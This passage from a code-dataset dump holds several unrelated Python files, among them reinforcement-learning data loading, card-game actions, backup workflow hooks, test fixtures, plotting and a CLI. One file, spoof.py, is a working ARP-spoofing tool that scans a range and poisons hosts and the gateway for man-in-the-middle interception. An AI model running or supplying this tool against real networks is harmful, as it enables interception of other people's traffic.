# [ seq_len ]
rewards = self.rewards_segmented[path_ind][start_ind:end_ind]
# [ seq_len ]
terminals = self.terminals_segmented[path_ind][start_ind:end_ind]
# [ (seq_len + 1) ]
pad_masks = self.pad_masks_segmented[path_ind][start_ind:end_ind + 1]
return observations, actions, rewards, terminals, pad_masks
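    # get_random_batch samples dataset indices uniformly *with replacement*
    # via np.random.randint and stacks the per-sequence arrays along a new
    # batch axis. A usage sketch (hypothetical env id, assuming d4rl ships it):
    #   env = gym.make('halfcheetah-medium-v2')
    #   ds = D4RLSequenceDataset('halfcheetah-medium-v2', env, seq_len=15)
    #   batch = ds.get_random_batch(32)  # batch.observations: (32, seq_len + 1, obs_dim)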
def get_random_batch(self, batch_size: int) -> Batch:
indices = np.random.randint(self.size, size=batch_size)
observations, actions, rewards, terminals, pad_masks = zip(
*[self[idx] for idx in indices])
return Batch(observations=np.stack(observations, axis=0),
actions=np.stack(actions, axis=0),
rewards=np.stack(rewards, axis=0),
terminals=np.stack(terminals, axis=0),
pad_masks=np.stack(pad_masks, axis=0)) | rjax/datasets/d4rl/sequence_dataset.py | 0.832679 | 0.50653 |
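For context, a minimal usage sketch for the sequence dataset above; it assumes d4rl and gym are installed, and the env name "halfcheetah-medium-v2" is an arbitrary illustrative choice, not one mandated by the module.

import gym
import d4rl  # noqa: F401  (importing registers the offline envs with gym)

from rjax.datasets.d4rl.sequence_dataset import D4RLSequenceDataset

env_name = "halfcheetah-medium-v2"  # assumed example env
env = gym.make(env_name)

# front_pad/back_pad zero-pad each trajectory; pad_masks is 1.0 on real
# steps and 0.0 on padding, so models can mask the padded positions.
dataset = D4RLSequenceDataset(env_name, env, seq_len=15, front_pad=4, back_pad=4)

batch = dataset.get_random_batch(batch_size=32)
print(batch.observations.shape)  # (32, seq_len + 1, obs_dim)
print(batch.pad_masks.shape)     # (32, seq_len + 1)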
from csrv.model.actions import subroutines
from csrv.model.actions.access_card import AccessCard
from csrv.model.actions.action import Action
from csrv.model.actions.advance_card import AdvanceCard
from csrv.model.actions.ai_break_subroutine import AiBreakSubroutine
from csrv.model.actions.boost_breaker_strength import BoostBreakerStrength
from csrv.model.actions.break_barrier_subroutine import BreakBarrierSubroutine
from csrv.model.actions.break_code_gate_subroutine import BreakCodeGateSubroutine
from csrv.model.actions.break_sentry_subroutine import BreakSentrySubroutine
from csrv.model.actions.break_subroutine import BreakSubroutine
from csrv.model.actions.card_click_ability import CardClickAbility
from csrv.model.actions.continue_run import ContinueRun
from csrv.model.actions.discard import Discard
from csrv.model.actions.draw_from_rnd import DrawFromRnD
from csrv.model.actions.draw_from_stack import DrawFromStack
from csrv.model.actions.expose_card import ExposeCard
from csrv.model.actions.gain_a_credit import GainACredit
from csrv.model.actions.install_agenda_asset import InstallAgendaAsset
from csrv.model.actions.install_resource import InstallResource
from csrv.model.actions.install_upgrade import InstallUpgrade
from csrv.model.actions.install_ice import InstallIce
from csrv.model.actions.install_program import InstallProgram
from csrv.model.actions.install_hardware import InstallHardware
from csrv.model.actions.jack_out import JackOut
from csrv.model.actions.make_a_run_action import MakeARunAction
from csrv.model.actions.mulligan_action import MulliganAction
from csrv.model.actions.new_timing_phase import NewTimingPhase
from csrv.model.actions.place_advancement import PlaceAdvancement
from csrv.model.actions.play_event_action import PlayEventAction
from csrv.model.actions.play_operation_action import PlayOperationAction
from csrv.model.actions.purge_virus_counters import PurgeVirusCounters
from csrv.model.actions.reduce_ice_strength import ReduceIceStrength
from csrv.model.actions.remove_a_tag import RemoveATag
from csrv.model.actions.rez_asset_upgrade import RezAssetUpgrade
from csrv.model.actions.rez_ice import RezIce
from csrv.model.actions.score_agenda import ScoreAgenda
from csrv.model.actions.steal_agenda import StealAgenda
from csrv.model.actions.take_brain_damage import TakeBrainDamage
from csrv.model.actions.trash import Trash
from csrv.model.actions.trash_on_access import TrashOnAccess
from csrv.model.actions.trash_resource import TrashResource | csrv/model/actions/__init__.py | 0.522689 | 0.038125 |
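The module above is a flat re-export layer. A hedged consumer-side sketch of what that buys (class names taken from the imports above):

# With the re-exports in place, callers only need the package root.
from csrv.model import actions

for action_cls in (actions.GainACredit, actions.DrawFromStack, actions.JackOut):
    print(action_cls.__name__)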
from collections import namedtuple
from karbor.common import constants
from karbor import exception
from karbor.services.protection import graph
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
HOOKS = (
HOOK_PRE_BEGIN,
HOOK_PRE_FINISH,
HOOK_MAIN,
HOOK_COMPLETE
) = (
'on_prepare_begin',
'on_prepare_finish',
'on_main',
'on_complete'
)
ResourceHooks = namedtuple('ResourceHooks', [
HOOK_PRE_BEGIN,
HOOK_PRE_FINISH,
HOOK_MAIN,
HOOK_COMPLETE,
])
OPERATION_EXTRA_ARGS = {
constants.OPERATION_RESTORE: ['restore', 'new_resources'],
}
def noop_handle(*args, **kwargs):
pass
class ResourceFlowGraphWalkerListener(graph.GraphWalkerListener):
def __init__(self, resource_flow, operation_type, context, parameters,
plugins, workflow_engine):
super(ResourceFlowGraphWalkerListener, self).__init__()
self.operation_type = operation_type
self.context = context
self.parameters = parameters or {}
self.plugins = plugins
self.workflow_engine = workflow_engine
self.flow = resource_flow
self.node_tasks = {}
self.task_stack = []
self.current_resource = None
def _create_hook_tasks(self, operation_obj, resource):
pre_begin_task = self._create_hook_task(operation_obj, resource,
HOOK_PRE_BEGIN)
pre_finish_task = self._create_hook_task(operation_obj, resource,
HOOK_PRE_FINISH)
main_task = self._create_hook_task(operation_obj, resource,
HOOK_MAIN)
post_task = self._create_hook_task(operation_obj, resource,
HOOK_COMPLETE)
return ResourceHooks(pre_begin_task, pre_finish_task, main_task,
post_task)
def _create_hook_task(self, operation_obj, resource, hook_type):
method = getattr(operation_obj, hook_type, noop_handle)
assert callable(method), (
'Resource {} method "{}" is not callable'
).format(resource.type, hook_type)
task_name = "{operation_type}_{hook_type}_{type}_{id}".format(
type=resource.type,
id=resource.id,
hook_type=hook_type,
operation_type=self.operation_type,
)
parameters = {}
parameters.update(self.parameters.get(resource.type, {}))
resource_id = '{}#{}'.format(resource.type, resource.id)
parameters.update(self.parameters.get(resource_id, {}))
injects = {
'context': self.context,
'parameters': parameters,
'resource': resource,
}
# Copy the extra-args list so append() does not mutate OPERATION_EXTRA_ARGS.
requires = list(OPERATION_EXTRA_ARGS.get(self.operation_type, []))
requires.append('operation_log')
task = self.workflow_engine.create_task(method,
name=task_name,
inject=injects,
requires=requires)
return task
def on_node_enter(self, node, already_visited):
resource = node.value
LOG.debug(
"Enter node (type: %(type)s id: %(id)s visited: %(visited)s)",
{"type": resource.type, "id": resource.id, "visited":
already_visited}
)
self.current_resource = resource
if already_visited:
self.task_stack.append(self.node_tasks[resource.id])
return
if resource.type not in self.plugins:
raise exception.ProtectionPluginNotFound(type=resource.type)
protection_plugin = self.plugins[resource.type]
operation_getter_name = 'get_{}_operation'.format(self.operation_type)
operation_getter = getattr(protection_plugin, operation_getter_name)
assert callable(operation_getter)
operation_obj = operation_getter(resource)
hooks = self._create_hook_tasks(operation_obj, resource)
LOG.debug("added operation %s hooks", self.operation_type)
self.node_tasks[resource.id] = hooks
self.task_stack.append(hooks)
self.workflow_engine.add_tasks(self.flow, hooks.on_prepare_begin,
hooks.on_prepare_finish, hooks.on_main,
hooks.on_complete)
self.workflow_engine.link_task(self.flow, hooks.on_prepare_begin,
hooks.on_prepare_finish)
self.workflow_engine.link_task(self.flow, hooks.on_prepare_finish,
hooks.on_main)
self.workflow_engine.link_task(self.flow, hooks.on_main,
hooks.on_complete)
def on_node_exit(self, node):
resource = node.value
LOG.debug(
"Exit node (type: %(type)s id: %(id)s)",
{"type": resource.type, "id": resource.id}
)
child_hooks = self.task_stack.pop()
if len(self.task_stack) > 0:
parent_hooks = self.task_stack[-1]
self.workflow_engine.link_task(self.flow,
parent_hooks.on_prepare_begin,
child_hooks.on_prepare_begin)
self.workflow_engine.link_task(self.flow,
child_hooks.on_prepare_finish,
parent_hooks.on_prepare_finish)
self.workflow_engine.link_task(self.flow, child_hooks.on_complete,
parent_hooks.on_complete)
def build_resource_flow(operation_type, context, workflow_engine,
plugins, resource_graph, parameters):
LOG.info("Build resource flow for operation %s", operation_type)
resource_graph_flow = workflow_engine.build_flow(
'ResourceGraphFlow_{}'.format(operation_type),
'graph',
)
resource_walker = ResourceFlowGraphWalkerListener(resource_graph_flow,
operation_type,
context,
parameters,
plugins,
workflow_engine)
walker = graph.GraphWalker()
walker.register_listener(resource_walker)
LOG.debug("Starting resource graph walk (operation %s)", operation_type)
walker.walk_graph(resource_graph)
LOG.debug("Finished resource graph walk (operation %s)", operation_type)
return resource_graph_flow | karbor/services/protection/resource_flow.py | 0.596903 | 0.159087 |
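To make the hook wiring above concrete, here is a standalone sketch (no karbor or taskflow required) that reproduces the same link rules: each resource chains pre_begin -> pre_finish -> main -> complete, and on node exit a child's hooks are nested inside its parent's pre_begin/pre_finish/complete.

# Toy reproduction of ResourceFlowGraphWalkerListener's link ordering.
links = []

def link(a, b):
    links.append((a, b))

def visit(name, children):
    hooks = {h: "%s.%s" % (name, h)
             for h in ("pre_begin", "pre_finish", "main", "complete")}
    # on_node_enter: sequential links within one resource
    link(hooks["pre_begin"], hooks["pre_finish"])
    link(hooks["pre_finish"], hooks["main"])
    link(hooks["main"], hooks["complete"])
    for child in children:
        child_hooks = visit(*child)
        # on_node_exit: nest the child inside the parent
        link(hooks["pre_begin"], child_hooks["pre_begin"])
        link(child_hooks["pre_finish"], hooks["pre_finish"])
        link(child_hooks["complete"], hooks["complete"])
    return hooks

visit("server", [("volume", []), ("network", [])])
for a, b in links:
    print(a, "->", b)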
import os
import pytest
import sqlalchemy as sa
from webtest import TestApp as WebTestApp
from zope.interface import implementer
from zope.interface.verify import verifyObject
from ensign import BinaryFlag
from ensign._interfaces import IStorage
from ensign._storage import DefaultStorage
from ensign.api import main
@implementer(IStorage)
class FakeStorage:
"""
Fake storage class, to simulate a very simple datastore.
"""
def __init__(self):
self.STORE = {}
assert verifyObject(IStorage, self)
def create(self, name, flagtype, **kwargs):
"""
Create a new flag, with its value set to None.
"""
self.STORE[name] = dict(
name=name,
type=flagtype,
value_binary=None,
**kwargs,
)
def exists(self, name):
"""
Check if a flag exists.
"""
return name in self.STORE
def load(self, name, flagtype):
"""
Load a flag's value from the store, given its name.
"""
return self.STORE[name]["value_{}".format(flagtype.value)]
def store(self, name, value, flagtype):
"""
Store a flag's value to the store, given its name.
"""
self.STORE[name]["value_{}".format(flagtype.value)] = value
def used(self, name):
"""
Get a flag's last used datetime, given its name.
"""
return self.STORE[name].get("used")
def info(self, name):
"""
Return a flag's descriptive information.
"""
info = self.STORE[name]
return dict(
name=info.get("name"),
label=info.get("label", ""),
description=info.get("description", ""),
tags=info.get("tags", ""),
)
def all(self):
"""
Return all flags.
"""
return self.STORE.keys()
@pytest.fixture(scope="function")
def fakestore():
"""
Fixture providing a fake storage.
It's cleaned up for every test.
"""
return FakeStorage()
@pytest.fixture(scope="function")
def fakeflag(fakestore):
"""
Fixture providing a flag stored in fake storage.
It's generated anew for every test.
"""
return BinaryFlag.create("fakeflag", store=fakestore)
@pytest.fixture(scope="session")
def _pre_db():
"""
Fixture preparing the test database and establishing all the necessary
connections, and cleaning everything up when done.
The operations are performed just once per session.
"""
engine = sa.create_engine(os.environ.get("MGMT_DB"))
conn = engine.connect()
conn.execute("commit")
conn.execute("create database flags_test")
DefaultStorage.init_db()
yield
DefaultStorage.connection.close()
DefaultStorage.engine.dispose()
conn.execute("commit")
conn.execute("drop database flags_test")
conn.close()
engine.dispose()
@pytest.fixture(scope="function")
def db(_pre_db):
"""
Fixture providing access to a test database.
Transactions are rolled back for every test.
"""
conn = DefaultStorage.connection
trans = conn.begin()
yield
trans.rollback()
@pytest.fixture(scope="session")
def api():
"""
Fixture providing a WebTest-produced instance of the flags API.
"""
return WebTestApp(main({
"testing": True,
}))
def pytest_addoption(parser):
"""
Command line option to enable acceptance tests.
"""
parser.addoption(
"--specs",
action="store_true",
help="Run acceptance test suite",
)
def pytest_runtest_setup(item):
"""
If the --specs command line argument is passed, run only acceptance tests.
Otherwise, skip them.
"""
marker = item.get_closest_marker("spec")
if item.config.getoption("--specs"):
if marker is None:
pytest.skip()
else:
if marker is not None:
pytest.skip() | tests/conftest.py | 0.641422 | 0.390185 |
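A hypothetical test module using the fixtures above; the assertion on the store assumes BinaryFlag.create registers the flag through the store's create() method, which is not shown here.

import pytest

def test_fakeflag_is_created(fakeflag, fakestore):
    # fakeflag and fakestore share the same function-scoped store instance.
    assert fakestore.exists("fakeflag")

@pytest.mark.spec
def test_acceptance_only(api):
    # Collected always, but skipped unless pytest runs with --specs.
    assert api is not None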
from dataclasses import dataclass
import numpy as np
import matplotlib.pyplot as plt
import math
import seaborn as sns
from tarpan.shared.info_path import InfoPath, get_info_path
from tarpan.shared.summary import SummaryParams, sample_summary
from tarpan.shared.param_names import filter_param_names
@dataclass
class HistogramParams:
title: str = None # Plot's title
max_plot_pages: int = 4 # Maximum number of plots to generate.
num_plot_rows: int = 4 # Number of rows (subplots) in a plot.
ncols: int = 2 # Number of columns in the plot.
hist_color = "#00a6ff" # Fill color for histogram bars
hist_edge_color = "#FFFFFF" # Edge color for the histogram bars
# Colors and line styles for KDE lines of the error bars (HPDIs)
# Sorted from largest to smallest HPDI values
kde_colors = ['#FF9922', '#6666FF', '#44FF55']
kde_line_styles = ['dotted', 'solid', '-.']
def save_histogram(samples, param_names=None,
info_path=InfoPath(),
histogram_params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make histograms for the parameters from posterior distribution.
Parameters
-----------
samples : Pandas DataFrame
Each column contains samples from posterior distribution.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
info_path.set_codefile()
df_summary, table = sample_summary(df=samples)
save_histogram_from_summary(samples, df_summary,
param_names=param_names,
info_path=info_path,
histogram_params=histogram_params,
summary_params=summary_params)
def save_histogram_from_summary(samples, summary, param_names=None,
info_path=InfoPath(),
histogram_params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make histograms for the parameters from posterior distribution.
Parameters
-----------
samples : Pandas DataFrame
Each column contains samples from posterior distribution.
summary : Pandas DataFrame
Summary information about each column.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
info_path = InfoPath(**info_path.__dict__)
figures_and_axes = make_histograms(
samples, summary, param_names=param_names,
params=histogram_params,
summary_params=summary_params)
base_name = info_path.base_name or "histogram"
info_path.extension = info_path.extension or 'pdf'
for i, figure_and_axis in enumerate(figures_and_axes):
info_path.base_name = f'{base_name}_{i + 1:02d}'
plot_path = get_info_path(info_path)
fig = figure_and_axis[0]
fig.savefig(plot_path, dpi=info_path.dpi)
plt.close(fig)
def make_histogram_one_page(i_start, samples, summary, param_names,
params: HistogramParams,
summary_params=SummaryParams()):
"""
Make a single file with histograms for the parameters
from posterior distribution.
"""
nrows = math.ceil((len(param_names) - i_start) / params.ncols)
if nrows > params.num_plot_rows:
nrows = params.num_plot_rows
ncols = params.ncols
fig_height = 4 * nrows
fig_width = 12
# Special case: if there is just one parameter show a plot with one column
if len(param_names) == 1:
ncols = 1
fig_width /= 2
fig, ax = plt.subplots(
nrows=nrows,
ncols=ncols, figsize=(fig_width, fig_height),
squeeze=False)
axes = ax.flatten()
for i_axis, ax in enumerate(axes):
i_param = i_start + i_axis
if i_param >= len(param_names):
break
parameter = param_names[i_param]
param_samples = samples[parameter]
data = summary.loc[parameter]
# Exclude extreme outliers from the samples
# to avoid the blow-up of the x-axis range
inner_range = np.percentile(param_samples, [0.5, 99.5])
samples_for_kde = param_samples[(param_samples > inner_range[0])
& (param_samples < inner_range[1])]
sns.distplot(samples_for_kde, kde=False, norm_hist=True, ax=ax,
hist_kws={
"color": params.hist_color,
"zorder": 1,
"edgecolor": params.hist_edge_color,
"linewidth": 1,
"alpha": 1})
# Show KDEs for the error bars (HPDIs)
# -----------
hpdis = sorted(summary_params.hpdi_percent(), reverse=True)
for i, hpdi in enumerate(hpdis):
start = f'{hpdi}CI-'
end = f'{hpdi}CI+'
# KDE plot
sns.kdeplot(samples_for_kde, shade=False,
clip=[data[start], data[end]],
label=f'{hpdi}% HPDI', ax=ax, legend=None,
color=params.kde_colors[i],
linestyle=params.kde_line_styles[i],
linewidth=2)
if i == len(hpdis) - 1:
# Show shade under KDE for the last error bar
sns.kdeplot(samples_for_kde, shade=True,
clip=[data[start], data[end]],
color="#000000",
label='_nolegend_', alpha=0.2,
zorder=10,
ax=ax, legend=None,
linewidth=2)
ax.axvline(x=data['Mean'], label='Mean', linewidth=1.5,
linestyle='dashed', color='#33AA66')
ax.axvline(x=data['Mode'], label='Mode', linewidth=1.5,
color='#FF66AA')
ax.set_xlabel(parameter)
# Do not draw the axes for non-existing plots
for ax in axes[len(param_names):]:
ax.axis('off')
handles, labels = axes[0].get_legend_handles_labels()
fig.legend(handles, labels, loc='upper center', mode='expand',
ncol=len(labels))
fig.tight_layout(rect=[0, 0, 1, 0.95])
return (fig, ax)
def make_histograms(samples, summary, param_names=None,
params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make multiple files with
histograms for the parameters from posterior distribution.
Parameters
-----------
samples : Pandas DataFrame
Each column contains samples from posterior distribution.
summary : Pandas DataFrame
Summary information about each column.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
param_names = filter_param_names(samples.columns, param_names)
# Total number of plots
n_plots = math.ceil(math.ceil(len(param_names) / params.ncols) /
params.num_plot_rows)
if n_plots > params.max_plot_pages:
print((
f'Showing only the first {params.max_plot_pages} '
f'pages out of {n_plots} histogram pages. '
'Consider specifying "param_names".'))
n_plots = params.max_plot_pages
if n_plots < 1:
n_plots = 1
figures_and_axes = []
# Make multiple traceplots
for i_plot in range(n_plots):
fig, ax = make_histogram_one_page(
i_start=i_plot * params.num_plot_rows * params.ncols,
samples=samples,
summary=summary,
param_names=param_names,
params=params,
summary_params=summary_params)
figures_and_axes.append([fig, ax])
return figures_and_axes | tarpan/shared/histogram.py | 0.873822 | 0.620162 |
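A minimal usage sketch for the histogram module above, with synthetic posterior samples; output location and file names come from the InfoPath defaults.

import numpy as np
import pandas as pd

from tarpan.shared.histogram import save_histogram

rng = np.random.default_rng(0)
samples = pd.DataFrame({
    "mu": rng.normal(0.0, 1.0, size=4000),
    "sigma": rng.lognormal(0.0, 0.3, size=4000),
})

# One subplot per parameter; PDF pages are split per HistogramParams.
save_histogram(samples, param_names=["mu", "sigma"])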
import logging
import click
import runez
from runez.pyenv import PythonDepot, PythonSpec
from runez.render import PrettyTable
from portable_python import BuildSetup, PPG
from portable_python.inspector import LibAutoCorrect, PythonInspector
LOG = logging.getLogger(__name__)
@runez.click.group()
@runez.click.version()
@runez.click.color()
@runez.click.debug("-v")
@runez.click.dryrun("-n")
@click.option("--config", "-c", metavar="PATH", default="portable-python.yml", show_default=True, help="Path to config file to use")
@click.option("--target", "-t", hidden=True, help="For internal use / testing")
def main(debug, config, target):
"""
Build (optionally portable) python binaries
"""
runez.system.AbortException = SystemExit
runez.log.setup(
debug=debug,
console_format="%(levelname)s %(message)s",
console_level=logging.INFO,
default_logger=LOG.info,
locations=None,
)
PPG.grab_config(config, target=target)
@main.command()
@click.option("--modules", "-m", metavar="CSV", help="External modules to include")
@click.option("--prefix", "-p", metavar="PATH", help="Use given --prefix for python installation (not portable)")
@click.argument("python_spec")
def build(modules, prefix, python_spec):
"""Build a portable python binary"""
setup = BuildSetup(python_spec, modules=modules, prefix=prefix)
setup.compile()
@main.command()
@click.option("--modules", "-m", metavar="CSV", help="External modules to include")
@click.argument("python_spec", required=False)
def build_report(modules, python_spec):
"""Show status of buildable modules, which will be auto-compiled"""
setup = BuildSetup(python_spec, modules=modules)
print(runez.bold(setup.python_spec))
report = setup.python_builder.modules.report()
print(report)
setup.validate_module_selection()
@main.command()
def diagnostics():
"""Show diagnostics info"""
with runez.Anchored("."):
depot = PythonDepot(use_path=True)
depot.scan_path_env_var()
def _diagnostics():
yield "invoker python", depot.invoker
yield from runez.SYS_INFO.diagnostics()
config = PPG.config.represented()
print(PrettyTable.two_column_diagnostics(_diagnostics(), depot.representation(), config))
@main.command()
@click.option("--modules", "-m", help="Modules to inspect")
@click.option("--verbose", "-v", is_flag=True, help="Show full so report")
@click.option("--prefix", "-p", is_flag=True, help="Build was done with --prefix (not portable)")
@click.argument("path")
def inspect(modules, verbose, prefix, path):
"""Inspect a python installation for non-portable dynamic lib usage"""
if path != "invoker":
path = runez.resolved_path(path)
inspector = PythonInspector(path, modules=modules)
runez.abort_if(inspector.python.problem, "%s: %s" % (runez.red(path), inspector.python.problem))
print(runez.blue(inspector.python))
print(inspector.represented(verbose=verbose))
if not modules or modules == "all":
problem = inspector.full_so_report.get_problem(portable=not prefix)
runez.abort_if(problem)
@main.command(name="list")
@click.option("--json", is_flag=True, help="Json output")
@click.argument("family", default="cpython")
def list_cmd(json, family):
"""List latest versions"""
fam = PPG.family(family, fatal=False)
if not fam:
runez.abort("Python family '%s' is not yet supported" % runez.red(family))
if json:
print(runez.represented_json(fam.available_versions))
return
print("%s:" % runez.bold(family))
for mm, v in fam.available_versions.items():
print(" %s: %s" % (runez.bold(mm), v))
def _find_recompress_source(folders, path):
candidate = runez.to_path(path)
if candidate.exists() or candidate.is_absolute():
return candidate.absolute() if candidate.exists() else None
candidates = [folders.base_folder, folders.build_folder, folders.dist, folders.destdir]
for candidate in candidates:
if candidate:
candidate = runez.to_path(candidate) / path
if candidate.exists():
return candidate.absolute()
@runez.log.timeit
def recompress_folder(folders, path, extension):
"""Recompress folder"""
dest = runez.SYS_INFO.platform_id.composed_basename("cpython", path.name, extension=extension)
dest = folders.dist / dest
runez.compress(path, dest, logger=print)
return dest
@runez.log.timeit
def recompress_archive(folders, path, extension):
stem = path.name.rpartition(".")[0]
if stem.endswith(".tar"):
stem = stem.rpartition(".")[0]
dest = "%s.%s" % (stem, extension)
dest = folders.dist / dest
if dest == path:
dest = "%s.%s" % (stem + "-recompressed", extension)
dest = folders.dist / dest
with runez.TempFolder() as _:
tmp_folder = runez.to_path("tmp")
runez.decompress(path, tmp_folder, simplify=True, logger=print)
runez.compress(tmp_folder, dest.name, arcname=dest.name, logger=print)
runez.move(dest.name, dest, logger=print)
return dest
@main.command()
@click.argument("path", required=True)
@click.argument("ext", required=True, type=click.Choice(runez.SYS_INFO.platform_id.supported_compression))
def recompress(path, ext):
"""
Re-compress an existing binary tarball, or folder
\b
Mildly useful for comparing sizes from different compressions
"""
extension = runez.SYS_INFO.platform_id.canonical_compress_extension(ext)
pspec = PythonSpec.to_spec(path)
folders = PPG.get_folders(base=".", family=pspec and pspec.family, version=pspec and pspec.version)
with runez.Anchored(folders.base_folder):
actual_path = _find_recompress_source(folders, path)
if not actual_path:
runez.abort("'%s' does not exist" % runez.red(runez.short(path)))
if actual_path.is_dir():
dest = recompress_folder(folders, actual_path, extension)
else:
dest = recompress_archive(folders, actual_path, extension)
print("Size of %s: %s" % (runez.short(actual_path), runez.bold(runez.represented_bytesize(actual_path))))
print("Size of %s: %s" % (runez.short(dest), runez.bold(runez.represented_bytesize(dest))))
@main.command()
@click.option("--commit", is_flag=True, help="Effectively perform the changes")
@click.option("--prefix", "-p", metavar="PATH", help="--prefix the program was built with (default: same as scanned path)")
@click.argument("path", required=True)
def lib_auto_correct(commit, prefix, path):
"""
Scan a python installation, auto-correct exes/libraries to use relative paths
This is mostly for testing purposes, applies the same method done internally by this tool.
Allows to exercise just the lib-auto-correct part without having to wait for full build to complete.
"""
if not runez.DRYRUN:
runez.log.set_dryrun(not commit)
path = runez.resolved_path(path)
if not prefix:
python = PPG.find_python(path)
runez.abort_if(python.problem)
r = runez.run(python.executable, "-c", "import sysconfig; print(sysconfig.get_config_var('prefix'))", dryrun=False)
prefix = runez.resolved_path(r.output)
lib_auto_correct = LibAutoCorrect(prefix, runez.to_path(path))
lib_auto_correct.run()
if __name__ == "__main__":
from portable_python.cli import main # noqa, re-import with proper package
main() | src/portable_python/cli.py | 0.382603 | 0.089137 |
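The group above is a standard click entry point, so it can be exercised in-process with click's test runner. A sketch; --help is used because it short-circuits before the group callback, so no config or network is needed.

from click.testing import CliRunner

from portable_python.cli import main

runner = CliRunner()
result = runner.invoke(main, ["--help"])
assert result.exit_code == 0
print(result.output)  # lists the registered subcommands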
from scapy.all import *
from colorama import Fore, init
import argparse
import sys
init()
parse = argparse.ArgumentParser()
parse.add_argument("-r","--range",help="Range to scan or spoof")
parse.add_argument("-g","--gateway",help="Gatewat")
parse = parse.parse_args()
def get_mac(gateway):
arp_layer = ARP(pdst=gateway)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
final_packet = broadcast/arp_layer
mac = srp(final_packet, timeout=2, verbose=False)[0]
mac = mac[0][1].hwsrc
return mac
def scanner(_range,gateway):
list_hosts = dict()
arp_layer = ARP(pdst=_range)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
final_packet = broadcast/arp_layer
answers = srp(final_packet, timeout=2, verbose=False)[0]
print("\n")
for a in answers:
if a[1].psrc != gateway:
print(
"[{}+{} HOST: {} MAC: {}]".format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX, a[1].psrc, a[1].hwsrc)
)
list_hosts.update({a[1].psrc: a[1].hwsrc})
return list_hosts
def restore_arp(destip,sourceip,hwsrc,hwdst):
dest_mac = hwdst
source_mac = hwsrc
packet = ARP(op=2, pdst=destip, hwdst=dest_mac, psrc=sourceip, hwsrc=source_mac)
send(packet, verbose=False)
def arp_spoof(hwdst, pdst,spsrc):
spoofer_packet = ARP(op=2, hwdst=hwdst, pdst=pdst, psrc=spsrc)
send(spoofer_packet, verbose=False)
def main():
if parse.range and parse.gateway:
mac_gateway = get_mac(parse.gateway)
print(mac_gateway)
hosts = scanner(parse.range, parse.gateway)
try:
print("\n[{}+{} RUNNING...]",format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX))
while True:
for n in hosts:
mac_target = hosts[n]
ip_target = n
gateway = parse.gateway
arp_spoof(mac_gateway, gateway, ip_target)
arp_spoof(mac_target, ip_target, gateway)
print("\r[{}+{}] Spoofing; {}".format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX, ip_target)), sys.stdout.flush()
except KeyboardInterrupt:
print("\n\nRestoring tables ARP...")
for n in hosts:
mac_target = hosts[n]
ip_target = n
gateway = parse.gateway
restore_arp(gateway, ip_target, mac_gateway, mac_target)
restore_arp(ip_target,gateway,mac_target,mac_gateway)
exit(0)
else:
print("I need parameters bitch")
if __name__ == '__main__':
main() | spoof.py | 0.287068 | 0.129155 |
import copy
import uuid
from collections import OrderedDict
from unittest import mock
import unittest
from tethys_gizmos.gizmo_options import MVLayer
from tethysext.atcore.services.model_database import ModelDatabase
from tethysext.atcore.services.model_db_spatial_manager import ModelDBSpatialManager
from tethysext.atcore.services.map_manager import MapManagerBase
class _MapManager(MapManagerBase):
def compose_map(self, request, *args, **kwargs):
return None
class MapManagerBaseTests(unittest.TestCase):
def setUp(self):
self.spatial_manager = mock.MagicMock(spec=ModelDBSpatialManager)
self.model_db = mock.MagicMock(spec=ModelDatabase)
self.map_manager = _MapManager(self.spatial_manager, self.model_db)
def tearDown(self):
pass
def test_map_extent_property(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
ret = self.map_manager.map_extent
self.map_manager.get_map_extent.assert_called()
self.assertEqual('test_extent', ret)
def test_map_extent_property_cached(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
self.map_manager._map_extent = 'bar'
ret = self.map_manager.map_extent
self.map_manager.get_map_extent.assert_not_called()
self.assertEqual('bar', ret)
def test_default_view_property(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
ret = self.map_manager.default_view
self.map_manager.get_map_extent.assert_called()
self.assertEqual('test_view', ret)
def test_default_view_property_cached(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
self.map_manager._default_view = 'foo'
ret = self.map_manager.default_view
self.map_manager.get_map_extent.assert_not_called()
self.assertEqual('foo', ret)
def test_build_layer_group(self):
ret = self.map_manager.build_layer_group(id='ID001', display_name='Foo', layers='Layer1')
self.assertEqual('Foo', ret['display_name'])
self.assertEqual('ID001', ret['id'])
self.assertEqual('checkbox', ret['control'])
self.assertEqual('Layer1', ret['layers'])
self.assertTrue(ret['visible'])
def test_build_layer_group_value_error(self):
self.assertRaises(ValueError, self.map_manager.build_layer_group,
id='ID001', display_name='Foo', layers='Layer1', layer_control='groupbox')
def test_get_wms_endpoint(self):
ret = self.map_manager.get_wms_endpoint()
self.spatial_manager.get_wms_endpoint.assert_called_with(public=True)
self.assertEqual(self.spatial_manager.get_wms_endpoint(), ret)
@mock.patch('tethysext.atcore.services.map_manager.MVView')
def test_get_map_extent(self, mock_mvv):
test_extent = [-10, -10, 10, 10]
self.spatial_manager.get_extent_for_project.return_value = test_extent
view, extent = self.map_manager.get_map_extent()
mock_mvv.assert_called_with(
projection='EPSG:4326',
center=[0.0, 0.0],
zoom=MapManagerBase.DEFAULT_ZOOM,
maxZoom=MapManagerBase.MAX_ZOOM,
minZoom=MapManagerBase.MIN_ZOOM
)
self.spatial_manager.get_extent_for_project.assert_called_with(
model_db=self.model_db
)
self.assertEqual(mock_mvv(), view)
self.assertEqual(test_extent, extent)
@mock.patch('tethysext.atcore.services.map_manager.MVView')
def test_get_map_extent_no_extent(self, mock_mvv):
self.spatial_manager.get_extent_for_project.return_value = None
view, extent = self.map_manager.get_map_extent()
mock_mvv.assert_called_with(
projection='EPSG:4326',
center=MapManagerBase.DEFAULT_CENTER,
zoom=MapManagerBase.DEFAULT_ZOOM,
